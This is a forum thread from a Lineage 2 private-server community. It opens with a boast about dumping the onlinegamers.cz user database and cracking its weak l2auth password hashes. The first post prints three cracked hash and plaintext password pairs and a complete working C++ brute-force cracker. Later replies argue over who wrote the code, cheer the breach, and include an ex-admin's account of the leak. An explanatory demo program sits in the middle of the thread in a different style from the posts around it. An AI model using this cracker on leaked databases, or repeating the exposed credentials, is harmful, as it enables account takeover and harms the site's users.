Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked the whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to set up mssql securely), small example:

 


 

It's easy cause that hash is CRAP and has looooooooot of collisions...

 

./crack

0xC9D81E75C8EDBE4075ECCACA079DBBBB

vanecka (0xC9D81E75C8EDBE4075ECCACA079DBBBB)

0xC9D81E75C8EDBE4075ECCACA079DBBBB vanecka (took 0 seconds)

0xB539DD269BFD93BE8B123434F9634545

peter7Y0 (0xB539DD269BFD93BE8B123434F9634545)

0xB539DD269BFD93BE8B123434F9634545 peter7Y0 (took 3 seconds)

0x35C266BA03B8D0862FEADAA06DF7D1D1

AbCbmfKA19N (0x35C266BA03B8D0862FEADAA06DF7D1D1)

0x35C266BA03B8D0862FEADAA06DF7D1D1 AbCbmfKA19N (took 3 seconds)

 

 

What do you say to those times? :)

 

 

And it's really easy:

 

#include <map>
#include <fstream>
#include <vector>
#include <iostream>
#include <string>
#include <cstdint>  // uint32_t
#include <cstdio>   // sprintf
#include <ctime>    // time, time_t
#include <math.h>
#include <string.h>

std::string encrypt(const std::string &plain)
{
    const static double arrayMul[4] = {213119, 213247, 213203, 213821};
    const static double arrayAdd[4] = {2529077, 2529089, 2529589, 2529997};
    unsigned char dst[16];
    unsigned char key[16];
    memset(dst, 0, 16);
    memset(key, 0, 16);
    double val[4];
    memset(val, 0, sizeof(val)); // val holds doubles, so clear the whole array

    for (size_t i(0) ; i < 16 ; ++i) {
        if (plain.size() > i) {
            dst[i] = static_cast<unsigned char>(plain[i]);
            key[i] = static_cast<unsigned char>(plain[i]);
        } else {
            dst[i] = 0;
            key[i] = 0;
        }
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        double x(key[i*4]);
        x += key[i*4+1] << 8;
        x += key[i*4+2] << 16;
        x += key[i*4+3] << 24;
        x *= arrayMul[i];
        x += arrayAdd[i];
        val[i] = fmod(x, 4294967296.0);
    }

    for (size_t i(0) ; i < 4 ; ++i) {
        key[i*4+0] = static_cast<uint32_t>(val[i]) & 0xff;
        key[i*4+1] = static_cast<uint32_t>(val[i] / 0x100) & 0xff;
        key[i*4+2] = static_cast<uint32_t>(val[i] / 0x10000) & 0xff;
        key[i*4+3] = static_cast<uint32_t>(val[i] / 0x1000000) & 0xff;
    }

    dst[0] ^= key[0];
    for (size_t i(1) ; i < 16 ; ++i) {
        dst[i] = dst[i] ^ dst[i-1] ^ key[i];
    }

    for (size_t i(0) ; i < 16 ; ++i) {
        if (!dst[i]) {
            dst[i] = 0x66;
        }
    }

    std::string result("0x");
    for (size_t i(0) ; i < 16 ; ++i) {
        char x[3];
        sprintf(x, "%02X", dst[i]);
        result += x;
    }

    return result;
}

std::string tryPassword(const std::string &hash,
                        const std::string &chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
                        const std::string &possibility = std::string())
{
    std::string result;
    size_t j(possibility.size());
    for (size_t i(0) ; i < chars.size() ; ++i) {
        std::string s(possibility);
        s.push_back(chars[i]);
        std::string enc(encrypt(s));
        // std::cerr << "Trying " << s << std::endl; // uncomment to see what we're trying
        if (enc.substr(0, 2+j*2) == hash.substr(0, 2+j*2)) {
            if (enc == hash) {
                std::cerr << s << " (" << enc << ")" << std::endl;
                return s; // comment out to write out all possible passwords xD
            }
            std::string res(tryPassword(hash, chars, s));
            if (!res.empty()) {
                return res;
            }
        }
    }
    return "";
}

int main(int argc, char **argv)
{
    std::map<std::string, std::string> crackMap;
    std::istream *ifs;
    if (argc != 1) {
        ifs = new std::ifstream(argv[1]);
    } else {
        ifs = &std::cin;
    }

    for (;;) {
        if (ifs->eof()) {
            break;
        }

        std::string line;
        getline(*ifs, line);
        if (line.size() == 34) {
            std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(line));
            if (icrackMap != crackMap.end()) {
                std::cout << line << " " << icrackMap->second << " (from cache)" << std::endl;
                continue;
            }
            time_t t(time(0));
            std::string password(tryPassword(line));
            if (!password.empty()) {
                crackMap.insert(std::make_pair(line, password));
                int seconds(time(0) - t);
                if (seconds < 60) {
                    std::cout << line << " " << password << " (took " << seconds << " seconds)" << std::endl;
                } else if (seconds % 60) {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes and " << (seconds % 60) << " seconds)" << std::endl;
                } else {
                    std::cout << line << " " << password << " (took " << (seconds / 60) << " minutes)" << std::endl;
                }
            }
        } else {
            size_t offset(line.find(":"));
            if (offset != std::string::npos) {
                std::string hash(line.substr(offset+1));
                std::map<std::string, std::string>::const_iterator icrackMap(crackMap.find(hash));
                if (icrackMap != crackMap.end()) {
                    std::cout << line.substr(0, offset) << ":" << icrackMap->second << std::endl;
                    continue;
                }
                std::string password(tryPassword(hash));
                crackMap.insert(std::make_pair(hash, password));
                if (!password.empty()) {
                    std::cout << line.substr(0, offset) << ":" << password << std::endl;
                }
            } else if (!line.empty()) {
                std::cout << line << " " << encrypt(line) << std::endl;
            }
        }
    }

    return 0;
}

So we advise everybody out there using l2auth to switch to MD5 (there are some files needed on postpacific.com)

 

 

Posted

We managed to crack C4 l2auth password hashes in nominal time and successfully cracked the whole onlinegamers.cz database (it was pretty easy to dump their database cause they don't know how to set up mssql securely)

 

It was easy to dump the database because the admin (poker10) dumped it himself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data is from an old database, the data doesn't even match.

 

Trust me, that is not copy/paste... I developed it by myself...

 

The code is generic for all PTS login servers with small changes.

So SnoopedMan is a cheater on the forum, not in game.

Posted

So you think that everyone was able to crack those hashes? Generic code is only the function std::string encrypt(const std::string &plain).. The rest is my code and it was released just here and on EPVP, but they've deleted it there.

Posted

Function std::string encrypt(const std::string &plain) is from PTS.

Rest is my code.

 

You know the "magic numbers" in the encoder, so you know the magic numbers in the decoder, like: substr(0, 2+j*2)...

 

Is it a mystery? What if you don't know the magic numbers in the encoder?

Anything universal for C4 or others?

 

QQ Not your code.

Posted

Good job! Hackers are getting better and better every day while the developers can't even think why this happens! ^^

 

Lol, if we don't get worse, we're bound to get much better!

 

Good post, you're on your way buddy.

Posted

 

OMG

You need encoder to check whether hash you generated starts with right chars.. that hash is crap, cause you can go char-by-char and check just the first 1 byte, first 2 bytes, first 3 bytes, ...

It's really not a cryptographic hash...

 

And substr(0, 2+j*2) means substring of that hash, 2+ because it starts with "0x", that we ignore and j*2 because that hash is encoded in hex to be human-readable...

 

Try to comprehend my code and then write your stupid posts xD
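The prefix property described in the post above, as an added example that is not part of the original thread or of the PTS code: it shows that two inputs sharing their first n characters always share their first n hash bytes, and that characters past the 16th are ignored. The names `l2authDigest` and `sharedDigestBytes` and the sample strings are constructed for illustration.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <string>

using Digest = std::array<uint8_t, 16>;

// Same transform as encrypt() in the post, done in 32-bit integer arithmetic
// and returning the raw 16 bytes instead of the "0x..." hex string.
Digest l2authDigest(const std::string &plain)
{
    static const uint32_t mul[4] = {213119, 213247, 213203, 213821};
    static const uint32_t add[4] = {2529077, 2529089, 2529589, 2529997};
    Digest in{}, out{};
    for (size_t i = 0; i < 16 && i < plain.size(); ++i)
        in[i] = static_cast<uint8_t>(plain[i]);
    for (size_t b = 0; b < 4; ++b) {
        uint32_t x = in[b*4] | in[b*4+1] << 8 | in[b*4+2] << 16
                   | static_cast<uint32_t>(in[b*4+3]) << 24;
        x = x * mul[b] + add[b];             // wraps modulo 2^32
        for (size_t k = 0; k < 4; ++k) {     // byte k of x depends only on bytes 0..k of the block
            size_t i = b*4 + k;
            uint8_t prev = i ? out[i-1] : 0;
            out[i] = static_cast<uint8_t>(in[i] ^ (x >> (8*k)) ^ prev);
        }
    }
    for (auto &byte : out)
        if (byte == 0) byte = 0x66;          // zero bytes are remapped, which merges outputs
    return out;
}

// Number of leading hash bytes two inputs have in common. A cryptographic
// hash would give about 0 here for any two different inputs.
size_t sharedDigestBytes(const std::string &a, const std::string &b)
{
    Digest da = l2authDigest(a), db = l2authDigest(b);
    size_t n = 0;
    while (n < 16 && da[n] == db[n]) ++n;
    return n;
}

int main()
{
    // Constructed inputs: identical first 9 characters, different 10th.
    std::cout << sharedDigestBytes("Sample-pw1", "Sample-pwX") << " of 16 bytes shared\n";
    // Constructed inputs that differ only after the 16th character.
    std::cout << sharedDigestBytes("0123456789abcdefAAA", "0123456789abcdefBBB") << " of 16 bytes shared\n";
    return 0;
}
```

Because every output byte is fixed by the input up to that position, a stored value leaks the password one character at a time, and there is no salt, so equal passwords always store equal values.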

Posted

It was easy to dump the database because the admin (poker10) dumped it himself, then was fired.

Now admin on GamePark. (Will dump their DB too?)

So this data is from an old database, the data doesn't even match.

Well, it's a little bit more complicated than it is usually presented by people.

First of all, poker10 wasn't fired. Nearly everyone from the "old" Lineage 2 team left at the end of November 08 after several disagreements with Rod, OG president in that time. Some of us (including me and poker10) stayed and helped to keep the game environment running for several weeks, but we were no longer members of the team. We, unluckily, also tried to give the new team some "advices", as they were quite new on their positions, but as both sides were a little bit stubborn, it only led to other disagreements. As poker10 was more offensive for the taste of new team, the major "blame" was laid on his head. And, thanks to "slightly inadequate" behaviour of martinus and some other members, the legend of "poker10 fired from OG" was born.

 

Hope this helps the legend to die.

 

Best regards,

Jan "Pandas" Smitka

Onlinegamers.cz, o.s. Lineage 2 ex-head-admin
